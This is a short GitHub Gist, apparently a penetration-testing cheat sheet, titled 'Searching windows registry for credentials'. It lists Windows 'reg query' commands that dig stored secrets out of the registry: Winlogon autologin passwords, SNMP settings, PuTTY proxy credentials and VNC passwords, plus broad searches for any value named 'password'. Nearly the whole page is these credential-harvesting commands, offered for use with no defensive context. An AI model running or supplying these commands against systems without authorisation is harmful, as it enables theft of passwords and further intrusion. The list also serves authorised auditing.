Created
June 23, 2022 02:26
-
-
Save r41k0u/6d2b1b83387705723662b72b5a98e375 to your computer and use it in GitHub Desktop.
Searching windows registry for credentials
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REG QUERY HKLM /F "password" /t REG_SZ /S /K | |
| REG QUERY HKCU /F "password" /t REG_SZ /S /K | |
| reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin | |
| reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" | |
| reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters | |
| reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials | |
| reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials | |
| reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password | |
| reg query HKLM /f password /t REG_SZ /s | |
| reg query HKCU /f password /t REG_SZ /s |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment